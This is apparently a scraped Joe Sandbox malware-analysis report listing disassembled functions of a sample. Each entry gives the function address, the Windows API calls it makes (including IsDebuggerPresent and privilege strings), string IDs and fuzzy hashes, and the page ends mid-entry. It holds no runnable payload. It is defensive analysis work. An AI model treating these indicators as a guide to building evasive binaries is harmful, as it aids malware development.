                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: CloseCreateFileHandle$DirectoryErrorLast$ControlCurrentDeleteDeviceH_prologProcessRemove
                                    • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                    • API String ID: 3935142422-3508440684
                                    • Opcode ID: cd6596c1e3d18927016ca96e0a7485f5ac588f176ef1e79f88060b73e3000e80
                                    • Instruction ID: b7badd5d23880b58ff0d81466a1813ccff0798f8ed337cfac9111f30968e622d
                                    • Opcode Fuzzy Hash: cd6596c1e3d18927016ca96e0a7485f5ac588f176ef1e79f88060b73e3000e80
                                    • Instruction Fuzzy Hash: 0BB1C071904215ABDF26DFA4DC45BEE77B8AF04300F0445A9F94AEB242D734BA49CBA1
                                    Function 00343281 Relevance: 12.9, APIs: 4, Strings: 3, Instructions: 608COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: H_prolog_memcmp
                                    • String ID: CMT$h%u$hc%u
                                    • API String ID: 3004599000-3282847064
                                    • Opcode ID: 0fb1a68531f578c2049893cceacf0d26b580af156efb025c521ff3d893928150
                                    • Instruction ID: 3f4c6d874b795e4d0c46327565e861c1c8c88c8b80d09641d5d0dc3b779afab5
                                    • Opcode Fuzzy Hash: 0fb1a68531f578c2049893cceacf0d26b580af156efb025c521ff3d893928150
                                    • Instruction Fuzzy Hash: 6F32A1715152849FDF16DF64C886AEA37E5AF15300F09447EFD8A8F282DB74BA48CB60
                                    Function 0036D00E Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: __floor_pentium4
                                    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                    • API String ID: 4168288129-2761157908
                                    • Opcode ID: c0af422a8f3425b8c2dc9352699ce56deba3620a55635d3d4f58cb4cee0fe66a
                                    • Instruction ID: ab9587bbe750655c0fad0fc2c5e220d6626f71d26c502907a8299ce99529d873
                                    • Opcode Fuzzy Hash: c0af422a8f3425b8c2dc9352699ce56deba3620a55635d3d4f58cb4cee0fe66a
                                    • Instruction Fuzzy Hash: 0BC26E75E086288FDB26CF28DD407E9B7B9EB45304F1585EAD80DE7248E774AE858F40
                                    Function 003427E8 Relevance: 7.8, APIs: 3, Strings: 1, Instructions: 794COMMON
                                    Download Yara Rule
                                    APIs
                                    • __EH_prolog.LIBCMT ref: 003427F1
                                    • _strlen.LIBCMT ref: 00342D7F
                                      • Part of subcall function 0035137A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0034B652,00000000,?,?,?,00010420), ref: 00351396
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00342EE0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: ByteCharH_prologMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                                    • String ID: CMT
                                    • API String ID: 1706572503-2756464174
                                    • Opcode ID: 629680e97494bc20610b5a532d51aa84e7feefa00e04b8580eee8dcdb8d01b22
                                    • Instruction ID: b76f71ffd79a6306c8aaf389609c2ab55acc4d1dbfad641b303034b482e10784
                                    • Opcode Fuzzy Hash: 629680e97494bc20610b5a532d51aa84e7feefa00e04b8580eee8dcdb8d01b22
                                    • Instruction Fuzzy Hash: C162D0719102448FDB2ADF24C885AEA3BE5EF55300F49457DFC9A9F282DB70B949CB60
                                    Function 0036866F Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00368767
                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00368771
                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 0036877E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                    • String ID:
                                    • API String ID: 3906539128-0
                                    • Opcode ID: a5a63929f825f3364865f15540a0a10de2d1704f5a96dc42372d062a641ede0e
                                    • Instruction ID: 23731a1a58e28823ab55fe0a4d5bdd716a1af4e3518abf857ed1985e2cd1ab64
                                    • Opcode Fuzzy Hash: a5a63929f825f3364865f15540a0a10de2d1704f5a96dc42372d062a641ede0e
                                    • Instruction Fuzzy Hash: 1731C8759012289BCB22DF64D889B9CB7B8BF08311F5041EAE91CA7251EB709F858F45
                                    Function 0036AAA8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: .
                                    • API String ID: 0-248832578
                                    • Opcode ID: 46e1eaf15385d636a93531f23ac87bab09f15dbb32ce0d652d3ef4d827be63a8
                                    • Instruction ID: 7689236f40a69670680f259f642ae27045d9a9c71e1c03267a0f5a294d711331
                                    • Opcode Fuzzy Hash: 46e1eaf15385d636a93531f23ac87bab09f15dbb32ce0d652d3ef4d827be63a8
                                    • Instruction Fuzzy Hash: 8E313571800209AFCB269E79CC84EFB7BBEDB85314F0581A8F518E7255E6709D44CF60
                                    Function 0036CB60 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 3f40ebe10d214b85774591126f504afcb75e73f030a81f23e755a653bb72e8d1
                                    • Instruction ID: 46b70cfdbd9fcf2c421746e778a27878f41b6946913cd965ff4631ee44b41642
                                    • Opcode Fuzzy Hash: 3f40ebe10d214b85774591126f504afcb75e73f030a81f23e755a653bb72e8d1
                                    • Instruction Fuzzy Hash: FE022C71E102199BDF15CFA9C8806ADFBF1FF48314F25816AD959EB384D731AE418B90
                                    Function 0035A63C Relevance: 3.0, APIs: 2, Instructions: 46COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0035A662
                                    • GetNumberFormatW.KERNEL32(00000400,00000000,?,0037E600,?,?), ref: 0035A6B1
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: FormatInfoLocaleNumber
                                    • String ID:
                                    • API String ID: 2169056816-0
                                    • Opcode ID: 9a7b0a8d424731ca113591445497f70ea07e84d9e425321a0896abc15b120ea8
                                    • Instruction ID: d44c6e4cc954d35c48510b1aabb65efdd8a94a4a8f1113dcd751123efc1ae276
                                    • Opcode Fuzzy Hash: 9a7b0a8d424731ca113591445497f70ea07e84d9e425321a0896abc15b120ea8
                                    • Instruction Fuzzy Hash: 4F017136500208BFEB22DF64DC05F9B77BCEF19711F504462FA48A7150D7719A54CBA5
                                    Function 00346EC9 Relevance: 3.0, APIs: 2, Instructions: 17windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetLastError.KERNEL32(0035117C,?,00000200), ref: 00346EC9
                                    • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00346EEA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: ErrorFormatLastMessage
                                    • String ID:
                                    • API String ID: 3479602957-0
                                    • Opcode ID: b83ae7ce567f8ef18b7e734063f59ceba7c57028ba46cb0f97100f1d2ec37ab6
                                    • Instruction ID: 5b03f0a623829623d4f1f2a01f8bc6b007d2ca886122eddefa65af30719c242c
                                    • Opcode Fuzzy Hash: b83ae7ce567f8ef18b7e734063f59ceba7c57028ba46cb0f97100f1d2ec37ab6
                                    • Instruction Fuzzy Hash: E5D0C7353C4306BFEA220E74CD06F677BDCB756B82F108514B357DD4D0C5709055A616
                                    Function 00371194 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0037118F,?,?,00000008,?,?,00370E2F,00000000), ref: 003713C1
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: ExceptionRaise
                                    • String ID:
                                    • API String ID: 3997070919-0
                                    • Opcode ID: 20112ba44c0f3b2576622513020dcdc8f725ff35163fbb3d538f8aca6f9aca28
                                    • Instruction ID: 6dc5fb54cba43f2bb69c88977cd7d85061754c678e5edb8124833869d436b6f0
                                    • Opcode Fuzzy Hash: 20112ba44c0f3b2576622513020dcdc8f725ff35163fbb3d538f8aca6f9aca28
                                    • Instruction Fuzzy Hash: 9AB12D366106099FD726CF2CC486B657BE0FF45364F66C658E999CF2A2C339D981CB40
                                    Function 0034407E Relevance: 1.6, Strings: 1, Instructions: 332COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: gj
                                    • API String ID: 0-4203073231
                                    • Opcode ID: 92e3851dc456a9e0d04a3cc39ea8a8e9b25b5c5c4257d403ed4c6e867446cccf
                                    • Instruction ID: 8899b764c756460a09df4a63fb09996be56680ad91848fa28fd77a4880eadcb0
                                    • Opcode Fuzzy Hash: 92e3851dc456a9e0d04a3cc39ea8a8e9b25b5c5c4257d403ed4c6e867446cccf
                                    • Instruction Fuzzy Hash: D7F1D2B2A083418FC358CF29D890A1AFBE1BFCC208F15892EF598D7751E734E9459B56
                                    Function 0034ACF5 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetVersionExW.KERNEL32(?), ref: 0034AD1A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: Version
                                    • String ID:
                                    • API String ID: 1889659487-0
                                    • Opcode ID: c14ffbf6177115bb44aacf83af3e5f9e70203f6117c3c6ff2d55cc21d5fa953b
                                    • Instruction ID: ee20745bedef5ad206f1c57a7411eb339ce95057b194cff281579c4e4c138f7c
                                    • Opcode Fuzzy Hash: c14ffbf6177115bb44aacf83af3e5f9e70203f6117c3c6ff2d55cc21d5fa953b
                                    • Instruction Fuzzy Hash: 9EF044B0D003088BCB6ACB18EC516E973A9BB49301F2042D9DA2987764D370A9848FA2
                                    Function 0035F063 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                    Download Yara Rule
                                    APIs
                                    • SetUnhandledExceptionFilter.KERNEL32(Function_0001F070,0035EAC5), ref: 0035F068
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: ExceptionFilterUnhandled
                                    • String ID:
                                    • API String ID: 3192549508-0
                                    • Opcode ID: 2c4ac27dc59c446ef5fa039d38d731f05ae05846f97dab9997d949d63fd82034
                                    • Instruction ID: a9e778ee1155bcffce9ae5a58a4cb93f165dba186809d318f5b0a4868a5183e4
                                    • Opcode Fuzzy Hash: 2c4ac27dc59c446ef5fa039d38d731f05ae05846f97dab9997d949d63fd82034
                                    • Instruction Fuzzy Hash:
                                    Function 0036B710 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: HeapProcess
                                    • String ID:
                                    • API String ID: 54951025-0
                                    • Opcode ID: 6b97a42aa98a02b755de557683dbc6a338b8131d1c6ad92c12585849f1041147
                                    • Instruction ID: 7e8cb997c7610d0b92e37fd624a8458ef6d1c3c4b4ced7aa983e791497c7bc3d
                                    • Opcode Fuzzy Hash: 6b97a42aa98a02b755de557683dbc6a338b8131d1c6ad92c12585849f1041147
                                    • Instruction Fuzzy Hash: FBA00474501141CFD751DF755D0D30D37DD75457D1F45C155550DC5170D73445505F01
                                    Function 00355C77 Relevance: .8, Instructions: 800COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 8a6e4fef8a49dcc930715721b7d4fffbd12b6467634e9eef11ded152ea66fbae
                                    • Instruction ID: 135152e95a559892dd33d1daf96ef8715976fe7f5037692a10b0ae5b9daebb5c
                                    • Opcode Fuzzy Hash: 8a6e4fef8a49dcc930715721b7d4fffbd12b6467634e9eef11ded152ea66fbae
                                    • Instruction Fuzzy Hash: EE623871604B848FCB26CF38C891AB9BBE1AF95305F45896DDC9A8B752D730F949CB10
                                    Function 003570BF Relevance: .8, Instructions: 773COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 575a8806441ce9a72c04ae9113137d22797e0c306676329538b0a0bf3ae15e30
                                    • Instruction ID: 907a4744969fcc567f63f15137aa544e43c066280656c7b2b7277cc9831ab00b
                                    • Opcode Fuzzy Hash: 575a8806441ce9a72c04ae9113137d22797e0c306676329538b0a0bf3ae15e30
                                    • Instruction Fuzzy Hash: 27622570608B869FC71ACF28D8809B9FBE1BF55305F14866DDC968B752D730EA59CB80
                                    Function 0034ED14 Relevance: .7, Instructions: 694COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d5448180e84c52624f7729a892eb382d9b2428a7fa06f80140d36ae3f2e7eaf5
                                    • Instruction ID: c01e30a5a923341fb15e8b7534905efea5acbe97fe3b091b03ef378ec9320c02
                                    • Opcode Fuzzy Hash: d5448180e84c52624f7729a892eb382d9b2428a7fa06f80140d36ae3f2e7eaf5
                                    • Instruction Fuzzy Hash: DA523B726087058FC718CF19C891A6AF7E1FFCC304F498A2DE5859B255D734EA19CB86
                                    Function 00356A7B Relevance: .5, Instructions: 509COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: dcad3ff3355eaa410b25e6cf6505ebf09517f6523d720f95d170c56cd33ab1f5
